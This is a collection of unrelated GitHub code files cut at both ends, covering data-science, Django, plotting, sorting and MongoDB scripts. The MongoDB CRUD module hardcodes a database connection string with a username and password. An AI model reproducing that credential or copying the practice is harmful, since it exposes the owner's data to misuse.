od.items())\r\n df = pd.DataFrame(res, columns = ['similarity_score', 'text'])\r\n df1 = df['text'].apply(lambda x: pd.Series(x))\r\n df1['similarity_score'] = df['similarity_score'].copy()\r\n return df1\r\n\r\nproducts = load_products()\r\nst.write('Corpus loaded, its length:', len(products))\r\n\r\nsearchtext = st.text_input('Please enter the search string','running shorts')\r\n# more than 5 characters\r\nif len(searchtext) < 5:\r\n st.error(\"You can't use less than 5 characters\")\r\nelse:\r\n pass\r\n\r\n# only alphabets and spaces\r\nif all(x.isalpha() or x.isspace() for x in searchtext):\r\n pass\r\nelse:\r\n st.error(\"Only alphabetical letters and spaces\")\r\n\r\nnumdocs = st.number_input('Please enter number of relevant documents to be returned', min_value=1, max_value=20)\r\n\r\nif st.checkbox('Return Results'):\r\n df1 = find_relevant_docs(searchtext , numdocs)\r\n df1.index += 1 \r\n st.write(df1)\r\n\r\n\r\n","repo_name":"ApurvaNaik/productSearchEngine","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36461625941","text":"# Реализовать проект «Операции с комплексными числами». Создайте класс «Комплексное число».\n# Реализуйте перегрузку методов сложения и умножения комплексных чисел.\n# Проверьте работу проекта.\n# Для этого создаёте экземпляры класса (комплексные числа), выполните сложение и умножение созданных экземпляров.\n# Проверьте корректность полученного результата.\n\nclass Complex:\n def __init__(self, complex1, complex2):\n self.c1 = complex1\n self.c2 = complex2\n\n def __add__(self, other):\n s1 = sum(self.c1) + sum(other.c1)\n s2 = sum(self.c2) + sum(other.c2)\n if s2 < 0:\n return f\"Результат сложения множеств: {s1}{s2}j\"\n else:\n return f\"Результат сложения множеств: {s1}+{s2}j\"\n\n def __mul__(self, other):\n a = self.c1[0]\n c = other.c1[0]\n b = self.c2[0]\n d = other.c2[0]\n if (a * d + b * c) < 0:\n return f\"Результат умножения множеств: {a * c - b * d}{a * d + b * c}j\"\n else:\n return f\"Результат умножения множеств: {a * c - b * d}+{a * d + b * c}j\"\n\n @classmethod\n def modify(cls, data):\n list_, list_i = [], []\n dataCop = data\n\n '''Собираю действительные числа'''\n if dataCop[0] == '-':\n dataCop = dataCop.lstrip(\"-\")\n if '-' in dataCop:\n c = dataCop[:dataCop.find(\"-\")]\n c = \"-\" + c\n elif '+' in dataCop:\n c = dataCop[:dataCop.find(\"+\")]\n else:\n c = '0'\n else:\n if '-' in dataCop:\n c = dataCop[:dataCop.find(\"-\")]\n elif '+' in dataCop:\n c = dataCop[:dataCop.find(\"+\")]\n else:\n c = '0'\n list_.append(int(c))\n\n '''Отделяю мнимое число от действительного'''\n if '-' in dataCop:\n d = dataCop[dataCop.find(\"-\"):].rstrip('j')\n elif '+' in dataCop:\n d = dataCop[dataCop.find(\"+\"):].rstrip('j')\n else:\n d = data[:data.find(\"j\")]\n if d == '-' or d == '+':\n d += '1'\n list_i.append(int(d))\n return cls(list_, list_i)\n\n\nc1 = Complex.modify('5+12j')\nc2 = Complex.modify('7-4j')\n\nprint(c1 + c2)\nprint(c1 * c2)\n","repo_name":"glagli/Python_Begin","sub_path":"lesson8/practice/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39481928354","text":"from sympy import *\nimport numpy as np\nimport os\nimport argparse\nfrom numpy import sin, cos, exp, log, sqrt\nimport scipy.special as sp\nfrom matplotlib import colors\nfrom sympy.physics.hydrogen import R_nl\n \n#cell size\nxsize = 80.111\nysize = 80.111\nzsize = 80.111\n\n#arguments from terminal\nparser = argparse.ArgumentParser()\nparser.add_argument(\"representation\", type=str, help=\"Your desire representation: abs, real, img, field. When using real or img their counterpart will be missing sometimes (l = 3) in this cases you can use abs if m = 0 but for the other cases you need to create the real part rename the output file then create the imaginary part and in the pymol terminal type load outputname.pdb.\")\nparser.add_argument(\"l\", type=int, help=\"Angular quantum number between 0 and n-1.\")\nparser.add_argument(\"m\", type=int, help=\"Magnetic quantum number between -l and l.\")\nparser.add_argument(\"grid\", type=int, help=\"Resolution for new equations maximum is 300\")\nparser.add_argument(\"scale\", type=int, help=\"Factor that rescales the coordinates minimum 50\")\nargs = parser.parse_args()\n\n#main variables\nfactor = args.scale\nplot = args.representation\nl = args.l \nm = args.m \ngrid = args.grid\narea = grid*grid \nPHI, THETA = np.mgrid[0:2*np.pi:grid*1j, 0:np.pi:grid*1j]\ncontador1 = 0\n\n#plot the real part of the spherical harmonics\nif plot == 'real':\n\tR = sp.sph_harm(m, l, PHI, THETA).real\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the imaginary part of the spherical harmonics\nif plot == 'img':\n\tR = sp.sph_harm(m, l, PHI, THETA).imag\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the absolute value of the spherical harmonics\nif plot == 'abs':\n\tR = np.abs(sp.sph_harm(m, l, PHI, THETA))\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the real part of the spherical harmonics like a field\nif plot == 'field':\n\tR = sp.sph_harm(m, l, PHI, THETA).real\n\ts = 1\n\tx = factor*(s*R+1)*np.sin(THETA)*np.cos(PHI)\n\ty = factor*(s*R+1)*np.sin(THETA)*np.sin(PHI)\n\tz = factor*(s*R+1)*np.cos(THETA)\n\tcolor = R/R.max()\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n","repo_name":"JAMelendezD/HowToPlot","sub_path":"pymol/orbitals.py","file_name":"orbitals.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5773360810","text":"from epics import PV\nimport matplotlib.pyplot as plt\nimport time\n\ndef Start_monitor():\n TM_02 = PV(\"TM1504-1-02\")\n TM_06 = PV(\"TM1504-1-06\")\n PS_adc = PV(\"PS1504-01:adc\")\n out_temp = []\n in_temp = []\n adc_array = []\n x_axis = []\n fig = plt.figure()\n temp_plt = fig.add_subplot(211)\n adc_plt = fig.add_subplot(212)\n Ln1, = temp_plt.plot(out_temp) #not sure why ln1 must be an element of a list\n Ln2, = temp_plt.plot(in_temp)\n Ln3, = adc_plt.plot(adc_array)\n plt.ion()\n temp_plt.set_title(\"Water Temperature\")\n adc_plt.set_title(\"PS ADC\")\n temp_plt.legend([\"Out going H20 T\", \"Incoming H2O T\"], loc=\"upper left\")\n plt.xlabel('time (s)')\n temp_plt.set_ylabel('Temp (°C)')\n adc_plt.set_ylabel('ADC')\n temp_plt.grid(linewidth=1, linestyle='-')\n adc_plt.grid(linewidth=1, linestyle='-')\n i = 0\n start = time.time()\n while True:\n out = TM_02.get(as_numpy=True)\n income = TM_06.get(as_numpy=True)\n adc = PS_adc.get(as_numpy=True)\n out_temp.append(out)\n in_temp.append(income)\n adc_array.append(adc)\n\n x_axis.append(i)\n Ln1.set_ydata(out_temp)\n Ln2.set_ydata(in_temp)\n Ln3.set_ydata(adc_array)\n Ln1.set_xdata(x_axis)\n Ln2.set_xdata(x_axis)\n Ln3.set_xdata(x_axis)\n\n temp_miny = min(in_temp) - 2\n temp_maxy = max(out_temp) + 2\n temp_plt.set_xlim(0, i + 1)\n temp_plt.set_ylim(temp_miny, temp_maxy)\n\n adc_miny = min(adc_array) - 2\n adc_maxy = max(adc_array) + 2\n adc_plt.set_xlim(0, i + 1)\n adc_plt.set_ylim(adc_miny, adc_maxy)\n\n plt.pause(3.5) #Allows time for graph to update\n i += 5\n time.sleep(5 - ((time.time() - start) % 5))\n\nif __name__ == '__main__':\n Start_monitor()\n\n\n\n","repo_name":"dragoon7201/HP_calib","sub_path":"Temp_monitor.py","file_name":"Temp_monitor.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18054606789","text":"#https://en.wikipedia.org/wiki/Quicksort (issue with floor(lo+hi)/2) not working)\n#https://www.geeksforgeeks.org/hoares-vs-lomuto-partition-scheme-quicksort/ (Works)\nimport numpy as np\nimport time\nimport math\nimport sys\n\ndef quicksort_hoare(A, lo, hi):\n # print(f\"lo = {lo}, hi = {hi}\")\n if lo < hi:\n p = partition_hoare(A,lo,hi)\n # print(f\"partition = {p}\")\n quicksort_hoare(A,lo,p)\n quicksort_hoare(A, p+1, hi)\n\ndef partition_hoare(A, lo, hi):\n # print(\"***START ***\")\n pivot = A[lo] #A[math.floor(lo+hi/2)]\n # print(f\"Pivot: {pivot}\")\n i = lo -1\n j = hi + 1\n # print(f\"i = {i} and j = {j}\")\n while(True):\n i += 1\n while (A[i] < pivot):\n i += 1\n\n j -= 1\n while (A[j] > pivot):\n j -= 1\n\n if (i >= j):\n return j\n \n A[i], A[j] = A[j], A[i]\n\nsys.setrecursionlimit(10**6) \nsizes = [10,100,1000,10000,100000,1000000,10000000]\nfor k in sizes:\n A = np.random.randint(1,100,k)\n # print(f\"len(A) = {len(A)}\")\n start = time.perf_counter()\n quicksort_hoare(A, 0, len(A)-1) \n end = time.perf_counter()\n total = end-start\n print(f\"{k} {total}\")\n\n","repo_name":"pushkarv/sorting","sub_path":"quicksort/quicksort_hoare.py","file_name":"quicksort_hoare.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32642259029","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n # path('', views.index, name='index'),\n path('index/', views.memory_list, name='index'),\n path('memory/<int:pk>/', views.memory_detail, name='memory_detail'),\n path('klc/', views.klc, name='klc'),\n path('rjc/', views.rjc, name='rjc'),\n path('lac/', views.lac, name='lac'),\n]","repo_name":"coopcraft/memoryapp","sub_path":"corememapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43974201452","text":"from django.contrib.auth.decorators import permission_required\nfrom django.contrib.messages import SUCCESS, add_message\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom itdagene.app.experiences.forms import ExperienceForm\nfrom itdagene.app.experiences.models import Experience\nfrom itdagene.core.decorators import staff_required\nfrom itdagene.core.models import Preference\n\n\n@staff_required()\ndef list(request):\n experience_lists = []\n for pref in Preference.objects.all().order_by(\"-year\"):\n experience_lists.append(\n (\n pref.year,\n Experience.objects.filter(year__year=pref.year).order_by(\"position\"),\n )\n )\n return render(\n request,\n \"experiences/list.html\",\n {\"experience_lists\": experience_lists, \"title\": _(\"Experiences\")},\n )\n\n\n@staff_required()\ndef view(request, id):\n experience = get_object_or_404(Experience, pk=id)\n return render(\n request,\n \"experiences/view.html\",\n {\n \"experience\": experience,\n \"title\": _(\"Experience\"),\n \"description\": str(experience) + \" \" + str(experience.year.year),\n },\n )\n\n\n@permission_required(\"experiences.add_experience\")\ndef add(request):\n form = ExperienceForm()\n if request.method == \"POST\":\n form = ExperienceForm(request.POST)\n if form.is_valid():\n data = form.save(commit=False)\n data.year = Preference.get_preference_by_year(request.user.year)\n data.save()\n add_message(request, SUCCESS, _(\"Experience added.\"))\n return redirect(reverse(\"itdagene.experiences.view\", args=[data.pk]))\n\n return render(\n request, \"experiences/form.html\", {\"form\": form, \"title\": _(\"Add Experience\")}\n )\n\n\n@permission_required(\"experiences.change_experience\")\ndef edit(request, id):\n es = get_object_or_404(Experience, pk=id)\n form = ExperienceForm(instance=es)\n if request.method == \"POST\":\n form = ExperienceForm(request.POST, instance=es)\n if form.is_valid():\n data = form.save()\n return redirect(reverse(\"itdagene.experiences.view\", args=[data.pk]))\n\n return render(\n request,\n \"experiences/form.html\",\n {\n \"form\": form,\n \"experience\": es,\n \"title\": _(\"Edit Experience\"),\n \"description\": str(es) + \" \" + str(es.year.year),\n },\n )\n","repo_name":"itdagene-ntnu/itdagene","sub_path":"itdagene/app/experiences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"74751247611","text":"import os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport time\n\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nfrom network.network import SimpleNN\n\ndef main():\n transform = transforms.Compose([transforms.ToTensor()])\n\n train_dataset = datasets.MNIST(\n root=\"./mnist_data\", train=True, transform=transform, download=True\n )\n\n eval_dataset = datasets.MNIST(\n root=\"./mnist_data\", train=False, transform=transform, download=True\n )\n\n model = SimpleNN(784, 100, 10)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=0.001)\n\n train_loader = DataLoader(train_dataset, batch_size=100, shuffle=True)\n eval_loader = DataLoader(eval_dataset, batch_size=100, shuffle=False)\n\n for _ in range(10):\n for images, labels in train_loader:\n outputs = model(images.view(-1, 784))\n loss = criterion(outputs, labels)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n correct = 0\n total = 0\n with torch.no_grad():\n for images, labels in eval_loader:\n outputs = model(images.view(-1, 784))\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum()\n\n print(\"Accuracy: {}\".format(100 * correct / total))\n\n #torch.save(model.state_dict(), \"./model.pth\")\n\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"LinneaBodin01/mnist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2882374770","text":"from django import forms\nfrom ShowGraph.models import Files,Product\n\nimport csv\nimport codecs\nfrom decimal import Decimal\nimport functools\n\nclass FormUploadFile(forms.Form):\n \n file = forms.FileField(label='Файл:')\n \n def load(self,user):\n file = csv.reader(codecs.iterdecode(self.cleaned_data.get('file').open(), 'utf-8-sig'),delimiter=';')\n header = next(file)\n \n if header==['client', 'tps', 'latency', 'stddev']:\n files = Files.objects.create(user=user,doc_name=self.cleaned_data.get('file').name,\n status=0)\n \n bulk_list = []\n \n for el in file:\n bulk_list.append(Product(files=files,\n client=Decimal(el[0].replace(\",\",\".\")),\n tps=Decimal(el[1].replace(\",\",\".\")),\n latency=Decimal(el[2].replace(\",\",\".\")),\n stddev=Decimal(el[3].replace(\",\",\".\")),))\n \n files.save()\n \n Product.objects.bulk_create(bulk_list)\n return files.id\n else:\n return False","repo_name":"Datrim2/TestTask","sub_path":"TestTask/ShowGraph/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32976580167","text":"import pytest\nfrom typing import Annotated\n\nimport sqlalchemy as sa\nfrom fastapi import Header\nfrom fastapi.testclient import TestClient\nfrom fastapi_pagination import add_pagination\nfrom sqlalchemy.orm import sessionmaker\n\nfrom optipy.config.settings import Settings\nfrom optipy.api.deps import get_auth_token_sub, get_db\nfrom optipy.db.base import Base\n\nfrom main import app\n\nsettings = Settings(_env_file=\".env.test\")\nengine = sa.create_engine(settings.SQLALCHEMY_DATABASE_URI)\nTestingSessionLocal = sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=engine,\n)\n\n# Set up the database once\nBase.metadata.drop_all(bind=engine)\nBase.metadata.create_all(bind=engine)\n\n\n# These two event listeners are only needed for sqlite for proper\n# SAVEPOINT / nested transaction support. Other databases like postgres\n# don't need them.\n# From: https://docs.sqlalchemy.org/en/14/dialects/sqlite.html#serializable-isolation-savepoints-transactional-ddl\n@sa.event.listens_for(engine, \"connect\")\ndef do_connect(dbapi_connection, connection_record):\n # disable pysqlite's emitting of the BEGIN statement entirely.\n # also stops it from emitting COMMIT before any DDL.\n dbapi_connection.isolation_level = None\n\n\n@sa.event.listens_for(engine, \"begin\")\ndef do_begin(conn):\n # emit our own BEGIN\n conn.exec_driver_sql(\"BEGIN\")\n\n\n# This fixture creates a nested transaction, recreates it when the\n# application code calls session.commit and rolls it back at the end.\n# Based on: https://docs.sqlalchemy.org/en/14/orm/session_transaction.html#joining-a-session-into-an-external-transaction-such-as-for-test-suites\n@pytest.fixture()\ndef session():\n connection = engine.connect()\n transaction = connection.begin()\n session = TestingSessionLocal(bind=connection)\n\n # Begin a nested transaction (using SAVEPOINT).\n nested = connection.begin_nested()\n\n # If the application code calls session.commit, it will end the nested\n # transaction. Need to start a new one when that happens.\n @sa.event.listens_for(session, \"after_transaction_end\")\n def end_savepoint(session, transaction):\n nonlocal nested\n if not nested.is_active:\n nested = connection.begin_nested()\n\n yield session\n\n # Rollback the overall transaction, restoring the state before the test ran.\n session.close()\n transaction.rollback()\n connection.close()\n\n\n# A fixture for the fastapi test client which depends on the\n# previous session fixture. Instead of creating a new session in the\n# dependency override, it uses the one provided by the session fixture.\n@pytest.fixture()\ndef client(session):\n def override_get_db():\n yield session\n\n def override_get_auth_token_sub(x_user: Annotated[str | None, Header()] = \"user_a\"):\n if x_user == \"user_a\":\n return \"mock_sub_user_a@clients\"\n\n if x_user == \"user_b\":\n return \"mock_sub_user_b@clients\"\n\n app.dependency_overrides[get_db] = override_get_db\n app.dependency_overrides[get_auth_token_sub] = override_get_auth_token_sub\n\n add_pagination(app)\n\n yield TestClient(app)\n\n del app.dependency_overrides[get_db]\n del app.dependency_overrides[get_auth_token_sub]\n","repo_name":"zigcccc/optipy","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18280954218","text":"#This program merges Dexter Industries' Raspberry Pi Google Vision API logo recognition code,\r\n# with original GTTS code. 12/12/18\r\n#Ben Bland\r\n\r\n\r\nimport argparse\r\nimport base64\r\nimport picamera\r\nimport subprocess \r\nimport os\r\nimport sys\r\n\r\nfrom gtts import gTTS\r\nfrom googleapiclient import discovery\r\nfrom oauth2client.client import GoogleCredentials\r\n\r\n\r\n\r\n\r\ndef takephoto():\r\n camera = picamera.PiCamera()\r\n camera.capture('image.jpg')\r\n camera.close()\r\n\r\ndef main():\r\n takephoto() \r\n credentials = GoogleCredentials.get_application_default()\r\n service = discovery.build('vision', 'v1', credentials=credentials)\r\n\r\n\r\n\r\n with open('image.jpg', 'rb') as image:\r\n image_content = base64.b64encode(image.read())\r\n service_request = service.images().annotate(body={\r\n 'requests': [{\r\n 'image': {\r\n 'content': image_content.decode('UTF-8')\r\n },\r\n 'features': [{\r\n 'type': 'LOGO_DETECTION',\r\n 'maxResults': 1\r\n }]\r\n }]\r\n })\r\n response = service_request.execute()\r\n \r\n try:\r\n label = response['responses'][0]['logoAnnotations'][0]['description']\r\n except:\r\n label = \"No response.\"\r\n \r\n print (label)\r\n text = label \r\n speech=gTTS(text,'en','slow')\r\n speech.save(\"testfile.mp3\")\r\n\r\n #Calling a CL command to play the newly created file\r\n os.system (\"omxplayer /home/pi/GoogleVisionTutorials/testfile.mp3\")\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n ","repo_name":"benbland33/talking-pi","sub_path":"480logo.py","file_name":"480logo.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37007808860","text":"# Um gerenciador de leiaute define a organização do widgets dentro de um container\n\nfrom tkinter import *\n\njanela = Tk()\n\n#Criar Label\nlb = Label(janela, text = 'Hello World!')\n\n#Informa o lugar aonde será mostrado a Label\nlb.place(x =110, y = 120)\n\njanela.geometry('300x300+200+200')\n\njanela.mainloop()","repo_name":"djalmarodriguess/Tkinter","sub_path":"Tkinter/03 - Gerenciador de leiaute place .py","file_name":"03 - Gerenciador de leiaute place .py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70194635131","text":"\nimport pymongo\n\n\nclient = pymongo.MongoClient(\"mongodb+srv://LucasMedici:Lucci1203@nomedocluster.ip8jntw.mongodb.net/?retryWrites=true&w=majority\")\nmydb = client.MercadoLivre\n\n\n# Create\ndef vendedor_insert(nome, email, produtos,id_vendedor):\n global mydb\n mycol = mydb.vendedor\n mydict = {\"nome\": nome, \"email\": email, \"produtos\":[produtos], \"id_vendedor\":id_vendedor}\n x = mycol.insert_one(mydict)\n print(x.inserted_id)\n\n\n# Find by id\ndef vendedor_findQuery():\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\": \"1\"}\n mydoc = mycol.find(myquery)\n for x in mydoc:\n print(x)\n\n\n\n# Find all\ndef vendedor_searchAll():\n global mydb\n mycol = mydb.vendedor\n mydoc = mycol.find().sort(\"nome\")\n for a in mydoc:\n print(a)\n\n# Delete\ndef vendedor_deleteOne(id_vendedor):\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\":id_vendedor}\n mycol.delete_one(myquery)\n\n\n#Update\ndef vendedor_Update(id_vendedor,novo_produto):\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\": id_vendedor}\n mydoc = mycol.find(myquery)\n for x in mydoc:\n x[\"produtos\"].append(novo_produto)\n produtos_salvos = x[\"produtos\"]\n novo_valores = {\"$set\": {\"produtos\": [produtos_salvos]}}\n\n\n mycol.update_one(myquery, novo_valores)\n\n\n","repo_name":"LucasMedici/CliCrudPythonMongo","sub_path":"crud_vendedor.py","file_name":"crud_vendedor.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9909824922","text":"import csv\nfrom io import StringIO\n\nimport pandas as pd\nimport xlsxwriter\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views.generic import ListView\n\nfrom .forms import (BalanceSearchForm, BOMCreateForm, BOMSearchForm,\n BOMUpdateForm, EcusCreateForm, EcusSearchForm,\n EcusUpdateForm, StockCreateForm, StockSearchForm,\n StockUpdateForm)\nfrom .models import BOM, Balance, Ecus, Stock\n\n\nclass IOBListView(LoginRequiredMixin, ListView):\n model = Stock\n template_name = 'stocksmanagement/list_items.html'\n context_object_name = 'queryset'\n ordering = ['-date']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = StockSearchForm(self.request.GET)\n context['title'] = 'IOB'\n return context\n\n def get_queryset(self):\n self.query_set = Stock.objects.all().filter(client=self.request.user)\n description = self.request.GET.get('description', '')\n item_name = self.request.GET.get('item_name', '')\n export_to_csv = self.request.GET.get('export_to_CSV', False)\n if description:\n self.query_set = self.query_set.filter(\n description__icontains=description\n )\n if item_name:\n self.query_set = self.query_set.filter(\n item_name__icontains=item_name\n )\n if export_to_csv:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n writer = csv.writer(response)\n writer.writerow(['description', 'ITEM NAME', 'QUANTITY'])\n for stock in self.query_set:\n writer.writerow(\n [stock.description, stock.item_name])\n return self.query_set\n\n\nclass SavedSamplesCsvView(IOBListView):\n \"\"\"\n Subclass of above view, to produce a csv file\n \"\"\"\n paginate_by = None\n template_name = 'stocksmanagement/stock.csv'\n content_type = 'text/csv'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n return context\n\n\n@login_required\ndef export_csv_iob(request):\n query_set = Stock.objects.all().filter(client=request.user)\n description = request.GET.get('description', '')\n item_name = request.GET.get('item_name', '')\n content_disposition = 'attachment; filename=\"List of stock'\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n content_disposition += f' - {description}'\n if item_name:\n query_set = query_set.filter(\n item_name__icontains=item_name\n )\n content_disposition += f' - {item_name}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow(['', ' ', ' ', ' ', ' Beginning Inventory', ' ', ' ', ' PR Purchase Receipt', ' ', ' ', ' MR Production Receipt', ' ', ' ', ' OR Unplanned Receipt', ' ', ' ', ' Stock Transfer Receipt',\n ' ', ' ', ' PI Issue for production', ' ', ' ', ' DI Sales Issue', ' ', ' ', ' OI Unplanned Issue', ' ', ' ', ' Stock Transfer Issue', ' ', ' '])\n writer.writerow(['Item Acount Description', ' Item', ' Ecus', ' Item Description', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price',\n ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price'])\n for stock in query_set:\n writer.writerow(\n [\n stock.description,\n stock.item_name,\n stock.ecus_code,\n stock.item_desciption,\n stock.begin_quantity,\n stock.get_beginning_amount(),\n stock.begin_price,\n stock.pr_purchase_quantity,\n stock.get_pr_purchase_amount(),\n stock.pr_purchase_price,\n stock.mr_production_quantity,\n stock.get_mr_production_amount(),\n stock.mr_production_price,\n stock.or_unplanned_quantity,\n stock.get_or_unplanned_amount(),\n stock.or_unplanned_price,\n stock.stock_transfer_quantity,\n stock.get_stock_transfer_amount(),\n stock.stock_transfer_price,\n stock.pi_issue_production_quantity,\n stock.get_pi_issue_production_amount(),\n stock.pi_issue_production_price,\n stock.di_sale_issue_quantity,\n stock.get_di_sale_issue_amount(),\n stock.di_sale_issue_price,\n stock.oi_unplanned_issue_quantity,\n stock.get_oi_unplanned_issue_amount(),\n stock.oi_unplanned_issue_price,\n stock.stock_transfer_issue_quantity,\n stock.get_stock_transfer_amount(),\n stock.stock_transfer_issue_price,\n ]\n )\n return response\n\n\n@login_required\ndef add_items(request):\n form = StockCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_items')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_items')\n\n context = {\n 'title': 'update item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n 